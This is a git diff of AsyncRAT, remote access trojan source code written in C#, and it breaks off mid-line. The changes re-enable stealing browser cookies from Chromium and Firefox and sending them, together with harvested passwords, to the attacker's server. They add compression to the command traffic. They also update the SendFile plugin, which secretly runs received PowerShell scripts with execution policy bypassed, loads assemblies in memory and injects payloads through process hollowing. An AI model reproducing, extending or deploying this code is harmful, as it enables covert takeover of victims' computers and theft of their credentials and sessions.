a/AsyncRAT-C#/Plugin/Options/Options/Options.csproj b/AsyncRAT-C#/Plugin/Options/Options/Options.csproj index 8f1cb9c..6feb2ee 100644 --- a/AsyncRAT-C#/Plugin/Options/Options/Options.csproj +++ b/AsyncRAT-C#/Plugin/Options/Options/Options.csproj @@ -59,6 +59,7 @@ + \ No newline at end of file diff --git a/AsyncRAT-C#/Plugin/Options/Options/Zip.cs b/AsyncRAT-C#/Plugin/Options/Options/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/AsyncRAT-C#/Plugin/Options/Options/Zip.cs @@ -0,0 +1,45 @@ +using System; +using System.IO; +using System.IO.Compression; + +namespace Plugin +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} diff --git a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Connection.cs b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Connection.cs index 97894b0..8146f4b 100644 --- a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Connection.cs +++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Connection.cs @@ -123,16 +123,12 @@ namespace Plugin return; } MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); diff --git a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/MsgPack.cs index 131eb37..f78f3f1 100644 --- a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/ProcessManager.csproj b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/ProcessManager.csproj index 94b192d..f128e1a 100644 --- a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/ProcessManager.csproj +++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/ProcessManager.csproj @@ -53,6 +53,7 @@ + \ No newline at end of file diff --git a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Zip.cs b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Zip.cs @@ -0,0 +1,45 @@ +using System; +using System.IO; +using System.IO.Compression; + +namespace Plugin +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Chromium.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Chromium.cs index a982117..0d48f57 100644 --- a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Chromium.cs +++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Chromium.cs @@ -92,16 +92,16 @@ namespace Plugin.Browsers.Chromium break; } - //List ffcs = ChromiumCookies.Cookies(b); - //foreach (ChromiumCookies.ChromiumCookie fcc in ffcs) - //{ - // Coocks.Append(string.Concat(new string[] - // { - // fcc.ToString(), - // "\n\n", - // })); - //} - //Coocks.Append("\n"); + List ffcs = ChromiumCookies.Cookies(b); + foreach (ChromiumCookies.ChromiumCookie fcc in ffcs) + { + Coocks.Append(string.Concat(new string[] + { + fcc.ToString(), + "\n\n", + })); + } + Coocks.Append("\n"); } diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Firefox/Firefox.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Firefox/Firefox.cs index d14ba3e..42927d6 100644 --- a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Firefox/Firefox.cs +++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Firefox/Firefox.cs @@ -1,4 +1,5 @@ -using System; +using Plugin.Browsers.Firefox.Cookies; +using System; using System.Collections.Generic; using System.Linq; using System.Text; @@ -10,30 +11,30 @@ namespace Plugin.Browsers.Firefox public class Firefox { public bool isOK = false; - //public void CookiesRecovery(StringBuilder Cooks) - //{ - // try - // { - // List ffcs = Cookies.FFCookiesGrabber.Cookies(); - // foreach (FFCookiesGrabber.FirefoxCookie fcc in ffcs) - // { - // if (!string.IsNullOrWhiteSpace(fcc.ToString()) && !isOK) - // { - // Cooks.Append("\n== Firefox ==========\n"); - // isOK = true; - // } - // Cooks.Append(string.Concat(new string[] - // { - // fcc.ToString(), - // "\n\n", - // })); - // } - // Cooks.Append("\n"); - // } - // catch - // { - // } - //} + public void CookiesRecovery(StringBuilder Cooks) + { + try + { + List ffcs = Cookies.FFCookiesGrabber.Cookies(); + foreach (FFCookiesGrabber.FirefoxCookie fcc in ffcs) + { + if (!string.IsNullOrWhiteSpace(fcc.ToString()) && !isOK) + { + Cooks.Append("\n== Firefox ==========\n"); + isOK = true; + } + Cooks.Append(string.Concat(new string[] + { + fcc.ToString(), + "\n\n", + })); + } + Cooks.Append("\n"); + } + catch + { + } + } public void CredRecovery(StringBuilder Pass) { diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/MsgPack.cs index 131eb37..f78f3f1 100644 --- a/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Packet.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Packet.cs index 169c32b..c395bab 100644 --- a/AsyncRAT-C#/Plugin/Recovery/Recovery/Packet.cs +++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Packet.cs @@ -14,22 +14,22 @@ namespace Plugin new Browsers.Firefox.Firefox().CredRecovery(Credentials); new Browsers.Chromium.Chromium().Recovery(Credentials); - //StringBuilder Cookies = new StringBuilder(); - //new Browsers.Firefox.Firefox().CookiesRecovery(Cookies); - //new Browsers.Chromium.Chromium().CookiesRecovery(Cookies); + StringBuilder Cookies = new StringBuilder(); + new Browsers.Firefox.Firefox().CookiesRecovery(Cookies); + new Browsers.Chromium.Chromium().CookiesRecovery(Cookies); MsgPack msgpack = new MsgPack(); msgpack.ForcePathObject("Packet").AsString = "recoveryPassword"; msgpack.ForcePathObject("Password").AsString = Credentials.ToString(); msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid; - //msgpack.ForcePathObject("Cookies").AsString = Cookies.ToString(); + msgpack.ForcePathObject("Cookies").AsString = Cookies.ToString(); Connection.Send(msgpack.Encode2Bytes()); } catch (Exception ex) { Error(ex.Message); + Connection.Disconnected(); } - Connection.Disconnected(); } public static void Error(string ex) diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Recovery.csproj b/AsyncRAT-C#/Plugin/Recovery/Recovery/Recovery.csproj index 8ed424a..b473ae6 100644 --- a/AsyncRAT-C#/Plugin/Recovery/Recovery/Recovery.csproj +++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Recovery.csproj @@ -56,7 +56,9 @@ + + @@ -71,6 +73,7 @@ + diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Zip.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Zip.cs @@ -0,0 +1,45 @@ +using System; +using System.IO; +using System.IO.Compression; + +namespace Plugin +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} diff --git a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Connection.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Connection.cs index 23c984a..30a8c58 100644 --- a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Connection.cs +++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Connection.cs @@ -123,16 +123,12 @@ namespace Plugin return; } MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); diff --git a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/MsgPack.cs index 131eb37..f78f3f1 100644 --- a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/RemoteCamera.csproj b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/RemoteCamera.csproj index 8a31534..5caca3e 100644 --- a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/RemoteCamera.csproj +++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/RemoteCamera.csproj @@ -87,6 +87,7 @@ + \ No newline at end of file diff --git a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Zip.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Zip.cs @@ -0,0 +1,45 @@ +using System; +using System.IO; +using System.IO.Compression; + +namespace Plugin +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Connection.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Connection.cs index fb6d64f..f8f64a2 100644 --- a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Connection.cs +++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Connection.cs @@ -124,16 +124,12 @@ namespace Plugin return; } MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/MsgPack.cs index 131eb37..f78f3f1 100644 --- a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Packet.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Packet.cs index f3b5d10..a0e9d62 100644 --- a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Packet.cs +++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Packet.cs @@ -71,6 +71,7 @@ namespace Plugin MsgPack msgpack; IUnsafeCodec unsafeCodec = new UnsafeStreamCodec(quality); MemoryStream stream; + Thread.Sleep(1); while (IsOk && Connection.IsConnected) { try diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/RemoteDesktop.csproj b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/RemoteDesktop.csproj index de1ab41..581134a 100644 --- a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/RemoteDesktop.csproj +++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/RemoteDesktop.csproj @@ -62,6 +62,7 @@ + \ No newline at end of file diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Zip.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Zip.cs @@ -0,0 +1,45 @@ +using System; +using System.IO; +using System.IO.Compression; + +namespace Plugin +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Connection.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Connection.cs index 70a0271..c91760e 100644 --- a/AsyncRAT-C#/Plugin/SendFile/SendFile/Connection.cs +++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Connection.cs @@ -123,16 +123,13 @@ namespace Plugin return; } MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); + } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs index b2e4958..e3d0655 100644 --- a/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs +++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs @@ -16,7 +16,7 @@ namespace Plugin.Handler { //Drop To Disk string fullPath = Path.GetTempFileName() + unpack_msgpack.ForcePathObject("Extension").AsString; - unpack_msgpack.ForcePathObject("File").SaveBytesToFile(fullPath); + File.WriteAllBytes(fullPath, Methods.Decompress(unpack_msgpack.ForcePathObject("File").GetAsBytes())); if (unpack_msgpack.ForcePathObject("Extension").AsString.ToLower().EndsWith(".ps1")) Process.Start(new ProcessStartInfo { FileName = "powershell", Arguments = "–ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File \"" + fullPath + "\"", CreateNoWindow = true, WindowStyle = ProcessWindowStyle.Hidden }); else @@ -45,7 +45,7 @@ namespace Plugin.Handler { try { - Assembly loader = Assembly.Load(buffer); + Assembly loader = Assembly.Load(Methods.Decompress(buffer)); object[] parm = null; if (loader.EntryPoint.GetParameters().Length > 0) { @@ -68,7 +68,7 @@ namespace Plugin.Handler { try { - RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection), buffer, true); + RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection), Methods.Decompress(buffer), true); } catch (Exception ex) { diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs index 3a211d9..be06962 100644 --- a/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs +++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs @@ -35,7 +35,11 @@ namespace Plugin.Handler catch { } } - Registry.CurrentUser.CreateSubKey(@"", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteSubKey(Connection.Hwid); + try + { + Registry.CurrentUser.CreateSubKey(@"", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteSubKey(Connection.Hwid); + } + catch { } string batch = Path.GetTempFileName() + ".bat"; using (StreamWriter sw = new StreamWriter(batch)) diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/MsgPack.cs index 131eb37..f78f3f1 100644 --- a/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Methods.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Methods.cs index 237f2b4..b045355 100644 --- a/AsyncRAT-C#/Plugin/SendFile/SendFile/Methods.cs +++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Methods.cs @@ -2,6 +2,8 @@ using System; using System.Collections.Generic; using System.Diagnostics; +using System.IO; +using System.IO.Compression; using System.Linq; using System.Runtime.InteropServices; using System.Security.Principal; @@ -10,7 +12,7 @@ using System.Threading; namespace Plugin { - public static class Methods + public static class Methods { public static void ClientExit() { @@ -60,6 +62,42 @@ namespace Plugin } } + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + [DllImport("ntdll.dll", SetLastError = true)] private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3); } diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs index b6c220c..231640b 100644 --- a/AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs +++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs @@ -70,7 +70,7 @@ namespace Plugin si.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation))); try { - if (!CreateProcess(path, quotedPath, IntPtr.Zero, IntPtr.Zero, false, 2 + 2, IntPtr.Zero, null, ref si, ref pi)) throw new Exception(); + if (!CreateProcess(path, quotedPath, IntPtr.Zero, IntPtr.Zero, false, 0x00000004u | 0x08000000u, IntPtr.Zero, null, ref si, ref pi)) throw new Exception(); int fileAddress = BitConverter.ToInt32(data, 120 / 2); int imageBase = BitConverter.ToInt32(data, fileAddress + 26 + 26); int[] context = new int[179]; diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/SendFile.csproj b/AsyncRAT-C#/Plugin/SendFile/SendFile/SendFile.csproj index 20cf53e..6930361 100644 --- a/AsyncRAT-C#/Plugin/SendFile/SendFile/SendFile.csproj +++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/SendFile.csproj @@ -56,6 +56,7 @@ + \ No newline at end of file diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Zip.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Zip.cs @@ -0,0 +1,45 @@ +using System; +using System.IO; +using System.IO.Compression; + +namespace Plugin +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} diff --git a/AsyncRAT-C#/Server/Algorithm/Zip.cs b/AsyncRAT-C#/Server/Algorithm/Zip.cs new file mode 100644 index 0000000..433d945 --- /dev/null +++ b/AsyncRAT-C#/Server/Algorithm/Zip.cs @@ -0,0 +1,46 @@ +using System; +using System.IO; +using System.IO.Compression; +using System.Threading.Tasks; + +namespace Server.Algorithm +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} diff --git a/AsyncRAT-C#/Server/Connection/Clients.cs b/AsyncRAT-C#/Server/Connection/Clients.cs index 7b90ba2..6a0e830 100644 --- a/AsyncRAT-C#/Server/Connection/Clients.cs +++ b/AsyncRAT-C#/Server/Connection/Clients.cs @@ -89,7 +89,13 @@ namespace Server.Connection BytesRecevied += Recevied; if (ClientMS.Length == ClientBuffersize) { - ThreadPool.QueueUserWorkItem(new Packet().Read, new object[] { ClientMS.ToArray(), this }); + + ThreadPool.QueueUserWorkItem(new Packet + { + client = this, + data = ClientMS.ToArray(), + }.Read, null); + ClientBuffer = new byte[4]; ClientMS.Dispose(); ClientMS = new MemoryStream(); diff --git a/AsyncRAT-C#/Server/Connection/Listener.cs b/AsyncRAT-C#/Server/Connection/Listener.cs index ba7919d..3b6cfd2 100644 --- a/AsyncRAT-C#/Server/Connection/Listener.cs +++ b/AsyncRAT-C#/Server/Connection/Listener.cs @@ -23,7 +23,7 @@ namespace Server.Connection ReceiveBufferSize = 50 * 1024, }; Server.Bind(ipEndPoint); - Server.Listen(100); + Server.Listen(500); new HandleLogs().Addmsg($"Listenning {port}", Color.Green); Server.BeginAccept(EndAccept, null); } diff --git a/AsyncRAT-C#/Server/Forms/Form1.cs b/AsyncRAT-C#/Server/Forms/Form1.cs index 88a7dea..66eff05 100644 --- a/AsyncRAT-C#/Server/Forms/Form1.cs +++ b/AsyncRAT-C#/Server/Forms/Form1.cs @@ -570,7 +570,7 @@ namespace Server { MsgPack packet = new MsgPack(); packet.ForcePathObject("Packet").AsString = "sendMemory"; - packet.ForcePathObject("File").SetAsBytes(File.ReadAllBytes(formSend.toolStripStatusLabel1.Tag.ToString())); + packet.ForcePathObject("File").SetAsBytes(Zip.Compress(File.ReadAllBytes(formSend.toolStripStatusLabel1.Tag.ToString()))); if (formSend.comboBox1.SelectedIndex == 0) { packet.ForcePathObject("Inject").AsString = ""; @@ -587,6 +587,7 @@ namespace Server foreach (Clients client in GetSelectedClients()) { + client.LV.ForeColor = Color.Red; ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes()); } } @@ -604,26 +605,32 @@ namespace Server { try { - OpenFileDialog openFileDialog = new OpenFileDialog(); - openFileDialog.Multiselect = true; - if (openFileDialog.ShowDialog() == DialogResult.OK) + using (OpenFileDialog openFileDialog = new OpenFileDialog()) { - MsgPack packet = new MsgPack(); - packet.ForcePathObject("Packet").AsString = "sendFile"; - packet.ForcePathObject("Update").AsString = "false"; - - MsgPack msgpack 